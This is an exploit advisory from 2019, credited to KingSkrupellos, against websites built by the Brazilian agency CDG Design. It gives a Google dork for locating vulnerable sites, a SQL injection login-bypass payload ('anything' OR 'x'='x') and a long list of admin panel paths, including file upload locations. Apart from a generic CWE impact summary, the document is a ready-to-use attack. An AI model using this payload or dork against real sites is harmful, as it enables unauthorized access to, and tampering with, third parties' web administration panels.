#######################################################################

# Exploit Title : Desenvolvido por Agencia CDG Design Brasil Improper Authentication
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 09/04/2019
# Vendor Homepage : agenciacdg.com.br
# Software Information Link : agenciacdg.com.br/#tf-about
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:Desenvolvimento por Agencia CDG Design site:br
# Vulnerability Type : 
CWE-287 [ Improper Authentication ]
CWE-592  [ Authentication Bypass Issues ]
CWE-305  [ Authentication Bypass by Primary Weakness ]
CWE-288  [ Authentication Bypass Using an Alternate Path or Channel ]
CWE-302 [ Authentication Bypass by Assumed-Immutable Data ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

#######################################################################

# Impact :
**********
* When an actor claims to have a given identity, the software does not prove or insufficiently 

proves that the claim is correct.

* The authentication algorithm is sound, but the implemented mechanism can be bypassed

as the result of a separate weakness that is primary to the authentication error.

* This product requires authentication, but the product has an alternate path or 

channel that does not require authentication.

* The authentication scheme or implementation uses key data elements that are assumed 

to be immutable, but can be controlled or modified by the attacker.

#######################################################################

# Payload :
***********
Admin Username : Select => Admin or Administrator

Admin Password : anything' OR 'x'='x

You are in the Admin Panel - Congratulations :)

# Useable Admin Control Panel Links Exploits :
******************************************
/admin/sistema/indexsistema.php
/admin/sistema/bannerseimagens.php
/admin/sistema/banners/[RANDOM-NUMBERS-LETTERS].
/admin/sistema/textosefrases.php
/admin/sistema/dralilian.php
/admin/sistema/portfolio.php
/admin/sistema/alterartextoportfolio.php
/admin/sistema/alterarimagensportfolio.php
/admin/sistema/imagensgaleriasportfolio/[YOURFILENAME].gif .jpg .png
/admin/sistema/depoimentos.php
/admin/sistema/alterardepoimentos.php?id=[ID-NUMBER]
/admin/sistema/videoclipes.php
/admin/sistema/alterarvideoclipe.php?id=[ID-NUMBER]
/admin/sistema/categorias.php
/admin/sistema/alterarcategorias.php?id=[ID-NUMBER]
/admin/sistema/servicos.php
/admin/sistema/alterarservicos.php?id=[ID-NUMBER]
/admin/sistema/tratamentos.php
/admin/sistema/alterartratamentos.php
/admin/sistema/tratamentos/[YOURFILENAME].gif .jpg .png
/admin/sistema/marcashome.php
/admin/sistema/marcasesubcategorias.php
/admin/sistema/produtos.php
/admin/sistema/alterarproduto.php
/admin/sistema/lojasparceiras.php
/admin/sistema/lojasdeaaz.php
/admin/sistema/alterarlojasdeaaz.php
/admin/sistema/paises.php
/admin/sistema/alterarpaises.php?id=[ID-NUMBER]
/admin/sistema/maisroteiros.ph
/admin/sistema/alterarmaisroteiros.php?id=[ID-NUMBER]
/admin/sistema/dicas.php
/admin/sistema/alterardicas.php?id=[ID-NUMBER]
/admin/sistema/sensibilidade.php
/admin/sistema/alterarsensibilidade.php?id=[ID-NUMBER]
/admin/sistema/agencias.php
/admin/sistema/alteraragencias.php?id=[ID-NUMBER]
/admin/sistema/editarmenudestinos.php
/admin/sistema/editarpaginaagencias.php
/admin/sistema/htmlecss.php

#######################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#######################################################################